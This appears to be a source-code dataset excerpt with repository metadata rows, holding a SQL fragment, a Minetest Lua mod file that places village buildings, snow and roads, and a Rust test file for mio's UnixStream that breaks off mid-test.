THROW 99001, 'Employee doesn''t belong to the appropriate department!', 1;
RETURN
END
COMMIT
EXEC usp_AssignEmployeeToReport 17, 2;
SELECT EmployeeId FROM Reports WHERE id = 2 | 31.62963 | 80 | 0.593677 | 3.015625 |
6db527cd014d265161e70cc8dcc13b7a2e6db1ac | 22,127 | lua | Lua | mg_villages/place_buildings.lua | maikerumine/mc2plus | 0d48f79d0cc3fca0be78c015e0d2b306dca16332 | [
"MIT"
] | 2 | 2017-08-07T09:51:48.000Z | 2019-10-26T18:53:18.000Z | mg_villages/place_buildings.lua | maikerumine/mc2plus | 0d48f79d0cc3fca0be78c015e0d2b306dca16332 | [
"MIT"
] | 3 | 2017-08-08T19:42:27.000Z | 2017-11-30T18:25:34.000Z | mg_villages/place_buildings.lua | maikerumine/mc2plus | 0d48f79d0cc3fca0be78c015e0d2b306dca16332 | [
"MIT"
] | null | null | null |
-- either uses get_node_or_nil(..) or the data from voxelmanip
-- the function might as well be local (only used by *.mg_drop_moresnow)
mg_villages.get_node_somehow = function( x, y, z, a, data, param2_data )
if( a and data and param2_data ) then
return { content = data[a:index(x, y, z)], param2 = param2_data[a:index(x, y, z)] };
end
-- no voxelmanip; get the node the normal way
local node = minetest.get_node_or_nil( {x=x, y=y, z=z} );
if( not( node ) ) then
return { content = moresnow.c_ignore, param2 = 0 };
end
return { content = minetest.get_content_id( node.name ), param2 = node.param2, name = node.name };
end
-- "drop" moresnow snow on diffrent shapes; works for voxelmanip and node-based setting
mg_villages.mg_drop_moresnow = function( x, z, y_top, y_bottom, a, data, param2_data)
-- this only works if moresnow is installed
if( not( mg_villages.moresnow_installed )) then
return;
end
local y = y_top;
local node_above = mg_villages.get_node_somehow( x, y+1, z, a, data, param2_data );
local node_below = nil;
while( y >= y_bottom ) do
node_below = mg_villages.get_node_somehow( x, y, z, a, data, param2_data );
if( node_above.content == moresnow.c_air
and node_below.content
and node_below.content ~= moresnow.c_ignore
and node_below.content ~= moresnow.c_air ) then
-- if the node below drops snow when digged (i.e. is either snow or a moresnow node), we're finished
local get_drop = minetest.get_name_from_content_id( node_below.content );
if( get_drop ) then
get_drop = minetest.registered_nodes[ get_drop ];
if( get_drop and get_drop.drop and type( get_drop.drop )=='string' and get_drop.drop == 'default:snow') then
return;
end
end
if( not(node_below.content)
or node_below.content == mg_villages.road_node
or node_below.content == moresnow.c_snow ) then
return;
end
local suggested = moresnow.suggest_snow_type( node_below.content, node_below.param2 );
-- c_snow_top and c_snow_fence can only exist when the node 2 below is a solid one
if( suggested.new_id == moresnow.c_snow_top
or suggested.new_id == moresnow.c_snow_fence) then
local node_below2 = mg_villages.get_node_somehow( x, y-1, z, a, data, param2_data);
if( node_below2.content ~= moresnow.c_ignore
and node_below2.content ~= moresnow.c_air ) then
local suggested2 = moresnow.suggest_snow_type( node_below2.content, node_below2.param2 );
if( suggested2.new_id == moresnow.c_snow ) then
return { height = y+1, suggested = suggested };
end
end
-- it is possible that this is not the right shape; if so, the snow will continue to fall down
elseif( suggested.new_id ~= moresnow.c_ignore ) then
return { height = y+1, suggested = suggested };
end
-- TODO return; -- abort; there is no fitting moresnow shape for the node below
end
y = y-1;
node_above = node_below;
end
end
-- helper function for generate_building
-- places a marker that allows players to buy plots with houses on them (in order to modify the buildings)
local function generate_building_plotmarker( pos, minp, maxp, data, param2_data, a, cid, building_nr_in_bpos, village_id)
-- position the plot marker so that players can later buy this plot + building in order to modify it
-- pos.o contains the original orientation (determined by the road and the side the building is
local p = {x=pos.x, y=pos.y+1, z=pos.z};
if( pos.o == 0 ) then
p.x = p.x - 1;
p.z = p.z + pos.bsizez - 1;
elseif( pos.o == 2 ) then
p.x = p.x + pos.bsizex;
elseif( pos.o == 1 ) then
p.z = p.z + pos.bsizez;
p.x = p.x + pos.bsizex - 1;
elseif( pos.o == 3 ) then
p.z = p.z - 1;
end
-- actually position the marker
if( p.x >= minp.x and p.x <= maxp.x and p.z >= minp.z and p.z <= maxp.z and p.y >= minp.y and p.y <= maxp.y) then
data[ a:index(p.x, p.y, p.z)] = cid.c_plotmarker;
param2_data[a:index(p.x, p.y, p.z)] = pos.brotate;
-- store the necessary information in the marker so that it knows for which building it is responsible
local meta = minetest.get_meta( p );
meta:set_string('village_id', village_id );
meta:set_int( 'plot_nr', building_nr_in_bpos );
meta:set_string('infotext', 'Plot No. '..tostring( building_nr_in_bpos ).. ' with '..tostring( mg_villages.BUILDINGS[pos.btype].scm ));
end
end
-- we do have a list of all nodenames the building contains (the .mts file provided it);
-- we can thus apply all replacements to these nodenames;
-- this also checks param2 and sets some other variables to indicate that it's i.e. a tree or a chest
-- (which both need special handling later on)
local function generate_building_translate_nodenames( nodenames, replacements, cid, binfo_scm, mirror_x, mirror_z )
if( not( nodenames )) then
return;
end
local i;
local v;
local new_nodes = {};
for i,node_name in ipairs( nodenames ) do
new_nodes[ i ] = {}; -- array for collecting information about the new content id for nodes with number "i" in their .mts savefile
-- some nodes may be called differently when mirrored; needed for doors
local new_node_name = node_name;
if( new_node_name and ( mirror_x or mirror_z ) and mg_villages.mirrored_node[ new_node_name ] ) then
new_node_name = mg_villages.mirrored_node[ node_name ];
new_nodes[ i ].is_mirrored = 1; -- currently unused
end
-- apply the replacements
if( new_node_name and replacements.table[ new_node_name ] ) then
new_node_name = replacements.table[ new_node_name ];
new_nodes[ i ].is_replaced = 1; -- currently unused
end
-- only existing nodes can be placed
if( new_node_name and minetest.registered_nodes[ new_node_name ]) then
local regnode = minetest.registered_nodes[ new_node_name ];
new_nodes[ i ].new_node_name = new_node_name;
new_nodes[ i ].new_content = minetest.get_content_id( new_node_name );
if( regnode.on_construct ) then
new_nodes[ i ].on_construct = 1;
end
local new_content = new_nodes[ i ].new_content;
if( new_content == cid.c_dirt or new_content == cid.c_dirt_with_grass ) then
new_nodes[ i ].is_grass = 1;
elseif( new_content == cid.c_sapling
or new_content == cid.c_jsapling
or new_content == cid.c_psapling
or new_content == cid.c_savannasapling
or new_content == cid.c_pinesapling ) then
-- store that a tree is to be grown there
new_nodes[ i ].is_tree = 1;
elseif( new_content == cid.c_chest
or new_content == cid.c_chest_locked
or new_content == cid.c_chest_shelf
or new_content == cid.c_chest_ash
or new_content == cid.c_chest_aspen
or new_content == cid.c_chest_birch
or new_content == cid.c_chest_maple
or new_content == cid.c_chest_chestnut
or new_content == cid.c_chest_pine
or new_content == cid.c_chest_spruce) then
-- we're dealing with a chest that might need filling
new_nodes[ i ].is_chestlike = 1;
elseif( new_content == cid.c_chest_private
or new_content == cid.c_chest_work
or new_content == cid.c_chest_storage ) then
-- we're dealing with a chest that might need filling
new_nodes[ i ].is_chestlike = 1;
-- TODO: perhaps use a locked chest owned by the mob living there?
-- place a normal chest here
new_nodes[ i ].new_content = cid.c_chest;
elseif( new_content == cid.c_sign ) then
-- the sign may require some text to be written on it
new_nodes[ i ].is_sign = 1;
end
-- mg_villages.get_param2_rotated( 'facedir', param2 ) needs to be called for nodes
-- which use either facedir or wallmounted;
-- realtest rotates some nodes diffrently and does not come with default:ladder
if( node_name == 'default:ladder' and not( minetest.registered_nodes[ node_name ])) then
new_nodes[ i ].change_param2 = {}; --{ 2->1, 5->2, 3->3, 4->0 }
new_nodes[ i ].change_param2[2] = 1;
new_nodes[ i ].change_param2[5] = 2;
new_nodes[ i ].change_param2[3] = 3;
new_nodes[ i ].change_param2[4] = 0;
new_nodes[ i ].paramtype2 = 'facedir';
-- ..except if they are stairs or ladders
elseif( string.sub( node_name, 1, 7 ) == 'stairs:' or string.sub( node_name, 1, 6 ) == 'doors:') then
new_nodes[ i ].paramtype2 = 'facedir';
-- normal nodes
elseif( regnode and regnode.paramtype2 and (regnode.paramtype2=='facedir' or regnode.paramtype2=='wallmounted')) then
new_nodes[ i ].paramtype2 = regnode.paramtype2;
end
-- we tried our best, but the replacement node is not defined
elseif( new_node_name ~= 'mg:ignore' ) then
mg_villages.print( mg_villages.DEBUG_LEVEL_WARNING, 'ERROR: Did not find a suitable replacement for '..tostring( node_name )..' (suggested but inexistant: '..tostring( new_node_name )..'). Building: '..tostring( binfo_scm )..'.');
new_nodes[ i ].ignore = 1; -- keep the old content
else -- handle mg:ignore
new_nodes[ i ].ignore = 1;
end
end
return new_nodes;
end
local function generate_building(pos, minp, maxp, data, param2_data, a, extranodes, replacements, cid, extra_calls, building_nr_in_bpos, village_id)
local binfo = mg_villages.BUILDINGS[pos.btype]
local scm
-- the building got removed from mg_villages.BUILDINGS in the meantime
if( not( binfo )) then
return;
end
-- schematics of .mts type are not handled here; they need to be placed using place_schematics
if( binfo.is_mts == 1 ) then
return;
end
-- skip building if it is not located at least partly in the area that is currently beeing generated
if( pos.x > maxp.x or pos.x + pos.bsizex < minp.x
or pos.z > maxp.z or pos.z + pos.bsizez < minp.z ) then
return;
end
if( pos.btype ~= "road" and
(( binfo.sizex ~= pos.bsizex and binfo.sizex ~= pos.bsizez )
or ( binfo.sizez ~= pos.bsizex and binfo.sizez ~= pos.bsizez )
or not( binfo.scm_data_cache ))) then
mg_villages.print( mg_villages.DEBUG_LEVEL_WARNING, 'ERROR: This village was created using diffrent buildings than those known know. Cannot place unknown building.');
return;
end
if( binfo.scm_data_cache )then
scm = binfo.scm_data_cache;
else
scm = binfo.scm
end
-- the fruit is set per building, not per village as the other replacements
if( binfo.farming_plus and binfo.farming_plus == 1 and pos.fruit ) then
mg_villages.get_fruit_replacements( replacements, pos.fruit);
end
local c_ignore = minetest.get_content_id("ignore")
local c_air = minetest.get_content_id("air")
local c_snow = minetest.get_content_id( "default:snow");
local c_dirt = minetest.get_content_id( "default:dirt" );
local c_dirt_with_grass = minetest.get_content_id( "default:dirt_with_grass" );
local c_dirt_with_snow = minetest.get_content_id( "default:dirt_with_snow" );
local scm_x = 0;
local scm_z = 0;
local step_x = 1;
local step_z = 1;
local scm_z_start = 0;
if( pos.brotate == 2 ) then
scm_x = pos.bsizex+1;
step_x = -1;
end
if( pos.brotate == 1 ) then
scm_z = pos.bsizez+1;
step_z = -1;
scm_z_start = scm_z;
end
local mirror_x = false;
local mirror_z = false;
if( pos.mirror ) then
if( binfo.axis and binfo.axis == 1 ) then
mirror_x = true;
mirror_z = false;
else
mirror_x = false;
mirror_z = true;
end
end
-- translate all nodenames and apply the replacements
local new_nodes = generate_building_translate_nodenames( binfo.nodenames, replacements, cid, binfo.scm, mirror_x, mirror_z );
for x = 0, pos.bsizex-1 do
scm_x = scm_x + step_x;
scm_z = scm_z_start;
for z = 0, pos.bsizez-1 do
scm_z = scm_z + step_z;
local xoff = scm_x;
local zoff = scm_z;
if( pos.brotate == 2 ) then
if( mirror_x ) then
xoff = pos.bsizex - scm_x + 1;
end
if( mirror_z ) then
zoff = scm_z;
else
zoff = pos.bsizez - scm_z + 1;
end
elseif( pos.brotate == 1 ) then
if( mirror_x ) then
xoff = pos.bsizez - scm_z + 1;
else
xoff = scm_z;
end
if( mirror_z ) then
zoff = pos.bsizex - scm_x + 1;
else
zoff = scm_x;
end
elseif( pos.brotate == 3 ) then
if( mirror_x ) then
xoff = pos.bsizez - scm_z + 1;
else
xoff = scm_z;
end
if( mirror_z ) then
zoff = scm_x;
else
zoff = pos.bsizex - scm_x + 1;
end
elseif( pos.brotate == 0 ) then
if( mirror_x ) then
xoff = pos.bsizex - scm_x + 1;
end
if( mirror_z ) then
zoff = pos.bsizez - scm_z + 1;
end
end
local has_snow = false;
local ground_type = c_dirt_with_grass;
for y = 0, binfo.ysize-1 do
local ax = pos.x+x;
local ay = pos.y+y+binfo.yoff;
local az = pos.z+z;
if (ax >= minp.x and ax <= maxp.x) and (ay >= minp.y and ay <= maxp.y) and (az >= minp.z and az <= maxp.z) then
local new_content = c_air;
local t = scm[y+1][xoff][zoff];
if( binfo.yoff+y == 0 ) then
local node_content = data[a:index(ax, ay, az)];
-- no snow on the gravel roads
if( node_content == c_dirt_with_snow or data[a:index(ax, ay+1, az)]==c_snow) then
has_snow = true;
end
ground_type = node_content;
end
if( t and type(t)=='table' and #t==2 and t[1] and t[2]) then
local n = new_nodes[ t[1] ]; -- t[1]: id of the old node
if( not( n.ignore )) then
new_content = n.new_content;
end
-- replace all dirt and dirt with grass at that x,z coordinate with the stored ground grass node;
if( n.is_grass ) then
new_content = ground_type;
end
if( n.on_construct ) then
if( not( extra_calls.on_constr[ new_content ] )) then
extra_calls.on_constr[ new_content ] = { {x=ax, y=ay, z=az}};
else
table.insert( extra_calls.on_constr[ new_content ], {x=ax, y=ay, z=az});
end
end
-- do not overwrite plotmarkers
if( new_content ~= cid.c_air or data[ a:index(ax,ay,az)] ~= cid.c_plotmarker ) then
data[ a:index(ax, ay, az)] = new_content;
end
-- store that a tree is to be grown there
if( n.is_tree ) then
table.insert( extra_calls.trees, {x=ax, y=ay, z=az, typ=new_content, snow=has_snow});
-- we're dealing with a chest that might need filling
elseif( n.is_chestlike ) then
table.insert( extra_calls.chests, {x=ax, y=ay, z=az, typ=new_content, bpos_i=building_nr_in_bpos});
-- the sign may require some text to be written on it
elseif( n.is_sign ) then
table.insert( extra_calls.signs, {x=ax, y=ay, z=az, typ=new_content, bpos_i=building_nr_in_bpos});
end
-- handle rotation
if( n.paramtype2 ) then
local param2 = t[2];
if( n.change_param2 and n.change_param2[ t[2] ]) then
param2 = n.change_param2[ param2 ];
end
local np2 = 0;
if( mirror_x ) then
np2 = rotation_table[ n.paramtype2 ][ param2+1 ][ pos.brotate+1 ][ 2 ];
elseif( mirror_z ) then
np2 = rotation_table[ n.paramtype2 ][ param2+1 ][ pos.brotate+1 ][ 3 ];
else
np2 = rotation_table[ n.paramtype2 ][ param2+1 ][ pos.brotate+1 ][ 1 ];
end
--[[
local param2list = mg_villages.get_param2_rotated( n.paramtype2, param2);
local np2 = param2list[ pos.brotate + 1];
-- mirror
if( mirror_x ) then
if( #param2list==5) then
np2 = mg_villages.mirror_facedir[ ((pos.brotate+1)%2)+1 ][ np2+1 ];
elseif( #param2list<5
and ((pos.brotate%2==1 and (np2==4 or np2==5))
or (pos.brotate%2==0 and (np2==2 or np2==3)))) then
np2 = param2list[ (pos.brotate + 2)%4 +1];
end
elseif( mirror_z ) then
if( #param2list==5) then
np2 = mg_villages.mirror_facedir[ (pos.brotate %2)+1 ][ np2+1 ];
elseif( #param2list<5
and ((pos.brotate%2==0 and (np2==4 or np2==5))
or (pos.brotate%2==1 and (np2==2 or np2==3)))) then
np2 = param2list[ (pos.brotate + 2)%4 +1];
end
end
--]]
param2_data[a:index(ax, ay, az)] = np2;
else
param2_data[a:index(ax, ay, az)] = t[2];
end
-- air and gravel (the road is structured like this)
elseif (type(t) ~= 'table' and t ~= c_ignore) then
new_content = t;
if( t and replacements.ids[ t ] ) then
new_content = replacements.ids[ t ];
end
if( t and t==c_dirt or t==c_dirt_with_grass ) then
new_content = ground_type;
end
if( data[a:index(ax,ay,az)]==c_snow ) then
has_snow = true;
end
data[a:index(ax, ay, az)] = new_content;
-- param2 is not set here
end
end
end
local ax = pos.x + x;
local az = pos.z + z;
local y_top = pos.y+binfo.yoff+binfo.ysize;
if( y_top+1 > maxp.y ) then
y_top = maxp.y-1;
end
local y_bottom = pos.y+binfo.yoff;
if( y_bottom < minp.y ) then
y_bottom = minp.y;
end
if( has_snow and ax >= minp.x and ax <= maxp.x and az >= minp.z and az <= maxp.z ) then
local res = mg_villages.mg_drop_moresnow( ax, az, y_top, y_bottom-1, a, data, param2_data);
if( res and data[ a:index(ax, res.height, az)]==cid.c_air) then
data[ a:index(ax, res.height, az)] = res.suggested.new_id;
param2_data[a:index(ax, res.height, az)] = res.suggested.param2;
has_snow = false;
end
end
end
end
end
-- actually place the buildings (at least those which came as .we files; .mts files are handled later on)
-- this code is also responsible for tree placement
mg_villages.place_buildings = function(village, minp, maxp, data, param2_data, a, cid, village_id)
local vx, vz, vs, vh = village.vx, village.vz, village.vs, village.vh
local village_type = village.village_type;
local seed = mg_villages.get_bseed({x=vx, z=vz})
local bpos = village.to_add_data.bpos;
village.to_grow = {}; -- TODO this is a temporal solution to avoid flying tree trunks
--generate_walls(bpos, data, a, minp, maxp, vh, vx, vz, vs, vnoise)
local pr = PseudoRandom(seed)
for _, g in ipairs(village.to_grow) do
if pos_far_buildings(g.x, g.z, bpos) then
mg.registered_trees[g.id].grow(data, a, g.x, g.y, g.z, minp, maxp, pr)
end
end
local replacements = mg_villages.get_replacement_table( village.village_type, nil, village.to_add_data.replacements );
cid.c_chest = mg_villages.get_content_id_replaced( 'default:chest', replacements );
cid.c_chest_locked = mg_villages.get_content_id_replaced( 'default:chest_locked', replacements );
cid.c_chest_private = mg_villages.get_content_id_replaced( 'cottages:chest_private', replacements );
cid.c_chest_work = mg_villages.get_content_id_replaced( 'cottages:chest_work', replacements );
cid.c_chest_storage = mg_villages.get_content_id_replaced( 'cottages:chest_storage', replacements );
cid.c_chest_shelf = mg_villages.get_content_id_replaced( 'cottages:shelf', replacements );
cid.c_chest_ash = mg_villages.get_content_id_replaced( 'trees:chest_ash', replacements );
cid.c_chest_aspen = mg_villages.get_content_id_replaced( 'trees:chest_aspen', replacements );
cid.c_chest_birch = mg_villages.get_content_id_replaced( 'trees:chest_birch', replacements );
cid.c_chest_maple = mg_villages.get_content_id_replaced( 'trees:chest_maple', replacements );
cid.c_chest_chestnut = mg_villages.get_content_id_replaced( 'trees:chest_chestnut', replacements );
cid.c_chest_pine = mg_villages.get_content_id_replaced( 'trees:chest_pine', replacements );
cid.c_chest_spruce = mg_villages.get_content_id_replaced( 'trees:chest_spruce', replacements );
cid.c_sign = mg_villages.get_content_id_replaced( 'default:sign_wall', replacements );
--print('REPLACEMENTS: '..minetest.serialize( replacements.table )..' CHEST: '..tostring( minetest.get_name_from_content_id( cid.c_chest ))); -- TODO
local extranodes = {}
local extra_calls = { on_constr = {}, trees = {}, chests = {}, signs = {} };
-- count the buildings
local anz_buildings = 0;
for i, pos in ipairs(bpos) do
if( pos.btype and not(pos.btype == 'road' )) then
local binfo = mg_villages.BUILDINGS[pos.btype];
-- count buildings which can house inhabitants as well as those requiring workers
if( binfo and binfo.inh and binfo.inh ~= 0 ) then
anz_buildings = anz_buildings + 1;
end
end
end
village.anz_buildings = anz_buildings;
for i, pos in ipairs(bpos) do
-- roads are only placed if there are at least mg_villages.MINIMAL_BUILDUNGS_FOR_ROAD_PLACEMENT buildings in the village
if( not(pos.btype) or pos.btype ~= 'road' or anz_buildings > mg_villages.MINIMAL_BUILDUNGS_FOR_ROAD_PLACEMENT )then
-- replacements are in table format for mapgen-based building spawning
generate_building(pos, minp, maxp, data, param2_data, a, extranodes, replacements, cid, extra_calls, i, village_id )
end
end
-- replacements are in list format for minetest.place_schematic(..) type spawning
return { extranodes = extranodes, bpos = bpos, replacements = replacements.list, dirt_roads = village.to_add_data.dirt_roads,
plantlist = village.to_add_data.plantlist, extra_calls = extra_calls };
end
-- add the dirt roads
mg_villages.place_dirt_roads = function(village, minp, maxp, data, param2_data, a, c_road_node)
local c_air = minetest.get_content_id( 'air' );
for _, pos in ipairs(village.to_add_data.dirt_roads) do
local param2 = 0;
if( pos.bsizex > 2 ) then
param2 = 1;
end
for x = 0, pos.bsizex-1 do
for z = 0, pos.bsizez-1 do
local ax = pos.x+x;
local az = pos.z+z;
if (ax >= minp.x and ax <= maxp.x) and (pos.y >= minp.y and pos.y <= maxp.y-2) and (az >= minp.z and az <= maxp.z) then
-- roads have a height of 1 block
data[ a:index( ax, pos.y, az)] = c_road_node;
param2_data[ a:index( ax, pos.y, az)] = param2;
-- ...with air above
data[ a:index( ax, pos.y+1, az)] = c_air;
data[ a:index( ax, pos.y+2, az)] = c_air;
end
end
end
end
end
if( minetest.get_modpath('moresnow' )) then
mg_villages.moresnow_installed = true;
end
| 37.50339 | 233 | 0.66733 | 3 |
74227eda1614f2d5f3ab3b90f5f686b3003559e2 | 17,098 | rs | Rust | tests/unix_stream.rs | stevenroose/mio | ac0515cc9519f228d39bb0d9055955faf7f75f34 | [
"MIT"
] | null | null | null | tests/unix_stream.rs | stevenroose/mio | ac0515cc9519f228d39bb0d9055955faf7f75f34 | [
"MIT"
] | null | null | null | tests/unix_stream.rs | stevenroose/mio | ac0515cc9519f228d39bb0d9055955faf7f75f34 | [
"MIT"
] | null | null | null | #![cfg(unix)]
#[macro_use]
mod util;
use log::warn;
use mio::net::UnixStream;
use mio::{Interests, Token};
use std::io::{self, IoSlice, IoSliceMut, Read, Write};
use std::net::Shutdown;
use std::os::unix::net;
use std::path::Path;
use std::sync::mpsc::channel;
use std::sync::{Arc, Barrier};
use std::thread;
use std::time::Duration;
use tempdir::TempDir;
use util::{
assert_send, assert_sync, assert_would_block, expect_events, expect_no_events, init_with_poll,
ExpectEvent, TryRead, TryWrite,
};
const DATA1: &[u8] = b"Hello same host!";
const DATA2: &[u8] = b"Why hello mio!";
const DATA1_LEN: usize = 16;
const DATA2_LEN: usize = 14;
const DEFAULT_BUF_SIZE: usize = 64;
const TOKEN_1: Token = Token(0);
const TOKEN_2: Token = Token(1);
#[test]
fn unix_stream_send_and_sync() {
assert_send::<UnixStream>();
assert_sync::<UnixStream>();
}
#[test]
fn unix_stream_smoke() {
#[allow(clippy::redundant_closure)]
smoke_test(|path| UnixStream::connect(path));
}
#[test]
fn unix_stream_connect() {
let (mut poll, mut events) = init_with_poll();
let barrier = Arc::new(Barrier::new(2));
let dir = assert_ok!(TempDir::new("unix"));
let path = dir.path().join("any");
let listener = assert_ok!(net::UnixListener::bind(path.clone()));
let stream = assert_ok!(UnixStream::connect(path));
let barrier_clone = barrier.clone();
let handle = thread::spawn(move || {
let (stream, _) = assert_ok!(listener.accept());
barrier_clone.wait();
drop(stream);
});
assert_ok!(poll.registry().register(
&stream,
TOKEN_1,
Interests::READABLE | Interests::WRITABLE
));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
);
barrier.wait();
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
);
assert_ok!(handle.join());
}
#[test]
fn unix_stream_from_std() {
smoke_test(|path| {
let local = assert_ok!(net::UnixStream::connect(path));
// `std::os::unix::net::UnixStream`s are blocking by default, so make sure
// it is in non-blocking mode before wrapping in a Mio equivalent.
assert_ok!(local.set_nonblocking(true));
Ok(UnixStream::from_std(local))
})
}
#[test]
fn unix_stream_pair() {
let (mut poll, mut events) = init_with_poll();
let (mut s1, mut s2) = assert_ok!(UnixStream::pair());
assert_ok!(poll
.registry()
.register(&s1, TOKEN_1, Interests::READABLE | Interests::WRITABLE));
assert_ok!(poll
.registry()
.register(&s2, TOKEN_2, Interests::READABLE | Interests::WRITABLE));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
);
let mut buf = [0; DEFAULT_BUF_SIZE];
assert_would_block(s1.read(&mut buf));
let wrote = assert_ok!(s1.write(&DATA1));
assert_eq!(wrote, DATA1_LEN);
assert_ok!(s1.flush());
let read = assert_ok!(s2.read(&mut buf));
assert_would_block(s2.read(&mut buf));
assert_eq!(read, DATA1_LEN);
assert_eq!(&buf[..read], DATA1);
assert_eq!(read, wrote, "unequal reads and writes");
let wrote = assert_ok!(s2.write(&DATA2));
assert_eq!(wrote, DATA2_LEN);
assert_ok!(s2.flush());
let read = assert_ok!(s1.read(&mut buf));
assert_eq!(read, DATA2_LEN);
assert_eq!(&buf[..read], DATA2);
assert_eq!(read, wrote, "unequal reads and writes");
}
#[test]
fn unix_stream_try_clone() {
let (mut poll, mut events) = init_with_poll();
let (handle, remote_addr) = new_echo_listener(1);
let path = remote_addr.as_pathname().expect("failed to get pathname");
let mut stream_1 = assert_ok!(UnixStream::connect(path));
assert_ok!(poll
.registry()
.register(&stream_1, TOKEN_1, Interests::WRITABLE));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
);
let mut buf = [0; DEFAULT_BUF_SIZE];
let wrote = assert_ok!(stream_1.write(&DATA1));
assert_eq!(wrote, DATA1_LEN);
let mut stream_2 = assert_ok!(stream_1.try_clone());
// When using `try_clone` the `TcpStream` needs to be deregistered!
assert_ok!(poll.registry().deregister(&stream_1));
drop(stream_1);
assert_ok!(poll
.registry()
.register(&stream_2, TOKEN_2, Interests::READABLE));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_2, Interests::READABLE)],
);
let read = assert_ok!(stream_2.read(&mut buf));
assert_eq!(read, DATA1_LEN);
assert_eq!(&buf[..read], DATA1);
// Close the connection to allow the remote to shutdown
drop(stream_2);
assert_ok!(handle.join());
}
#[test]
fn unix_stream_peer_addr() {
let (handle, expected_addr) = new_echo_listener(1);
let expected_path = expected_addr.as_pathname().expect("failed to get pathname");
let stream = assert_ok!(UnixStream::connect(expected_path));
assert_eq!(
assert_ok!(stream.peer_addr()).as_pathname().unwrap(),
expected_path
);
assert!(assert_ok!(stream.local_addr()).as_pathname().is_none());
// Close the connection to allow the remote to shutdown
drop(stream);
assert_ok!(handle.join());
}
#[test]
fn unix_stream_shutdown_read() {
let (mut poll, mut events) = init_with_poll();
let (handle, remote_addr) = new_echo_listener(1);
let path = remote_addr.as_pathname().expect("failed to get pathname");
let mut stream = assert_ok!(UnixStream::connect(path));
assert_ok!(poll.registry().register(
&stream,
TOKEN_1,
Interests::READABLE.add(Interests::WRITABLE)
));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
);
let wrote = assert_ok!(stream.write(DATA1));
assert_eq!(wrote, DATA1_LEN);
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
);
assert_ok!(stream.shutdown(Shutdown::Read));
expect_readiness!(poll, events, is_read_closed);
// Shutting down the reading side is different on each platform. For example
// on Linux based systems we can still read.
#[cfg(any(
target_os = "dragonfly",
target_os = "freebsd",
target_os = "ios",
target_os = "macos",
target_os = "netbsd",
target_os = "openbsd"
))]
{
let mut buf = [0; DEFAULT_BUF_SIZE];
let read = assert_ok!(stream.read(&mut buf));
assert_eq!(read, 0);
}
// Close the connection to allow the remote to shutdown
drop(stream);
assert_ok!(handle.join());
}
#[test]
fn unix_stream_shutdown_write() {
let (mut poll, mut events) = init_with_poll();
let (handle, remote_addr) = new_echo_listener(1);
let path = remote_addr.as_pathname().expect("failed to get pathname");
let mut stream = assert_ok!(UnixStream::connect(path));
assert_ok!(poll.registry().register(
&stream,
TOKEN_1,
Interests::WRITABLE.add(Interests::READABLE)
));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
);
let wrote = assert_ok!(stream.write(DATA1));
assert_eq!(wrote, DATA1_LEN);
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
);
assert_ok!(stream.shutdown(Shutdown::Write));
#[cfg(any(
target_os = "dragonfly",
target_os = "freebsd",
target_os = "ios",
target_os = "macos",
target_os = "netbsd",
target_os = "openbsd"
))]
expect_readiness!(poll, events, is_write_closed);
let err = assert_err!(stream.write(DATA2));
assert_eq!(err.kind(), io::ErrorKind::BrokenPipe);
// Read should be ok
let mut buf = [0; DEFAULT_BUF_SIZE];
let read = assert_ok!(stream.read(&mut buf));
assert_eq!(read, DATA1_LEN);
assert_eq!(&buf[..read], DATA1);
// Close the connection to allow the remote to shutdown
drop(stream);
assert_ok!(handle.join());
}
#[test]
fn unix_stream_shutdown_both() {
let (mut poll, mut events) = init_with_poll();
let (handle, remote_addr) = new_echo_listener(1);
let path = remote_addr.as_pathname().expect("failed to get pathname");
let mut stream = assert_ok!(UnixStream::connect(path));
assert_ok!(poll.registry().register(
&stream,
TOKEN_1,
Interests::WRITABLE.add(Interests::READABLE)
));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
);
let wrote = assert_ok!(stream.write(DATA1));
assert_eq!(wrote, DATA1_LEN);
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
);
assert_ok!(stream.shutdown(Shutdown::Both));
expect_readiness!(poll, events, is_write_closed);
// Shutting down the reading side is different on each platform. For example
// on Linux based systems we can still read.
#[cfg(any(
target_os = "dragonfly",
target_os = "freebsd",
target_os = "ios",
target_os = "macos",
target_os = "netbsd",
target_os = "openbsd"
))]
{
let mut buf = [0; DEFAULT_BUF_SIZE];
let read = assert_ok!(stream.read(&mut buf));
assert_eq!(read, 0);
}
let err = assert_err!(stream.write(DATA2));
#[cfg(unix)]
assert_eq!(err.kind(), io::ErrorKind::BrokenPipe);
#[cfg(window)]
assert_eq!(err.kind(), io::ErrorKind::ConnectionAbroted);
// Close the connection to allow the remote to shutdown
drop(stream);
assert_ok!(handle.join());
}
#[test]
fn unix_stream_shutdown_listener_write() {
let barrier = Arc::new(Barrier::new(2));
let (mut poll, mut events) = init_with_poll();
let (handle, remote_addr) = new_noop_listener(1, barrier.clone());
let path = remote_addr.as_pathname().expect("failed to get pathname");
let stream = assert_ok!(UnixStream::connect(path));
assert_ok!(poll.registry().register(
&stream,
TOKEN_1,
Interests::READABLE.add(Interests::WRITABLE)
));
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
);
barrier.wait();
expect_readiness!(poll, events, is_read_closed);
barrier.wait();
assert_ok!(handle.join());
}
#[test]
fn unix_stream_register() {
let (mut poll, mut events) = init_with_poll();
let (handle, remote_addr) = new_echo_listener(1);
let path = remote_addr.as_pathname().expect("failed to get pathname");
let stream = assert_ok!(UnixStream::connect(path));
assert_ok!(poll
.registry()
.register(&stream, TOKEN_1, Interests::READABLE));
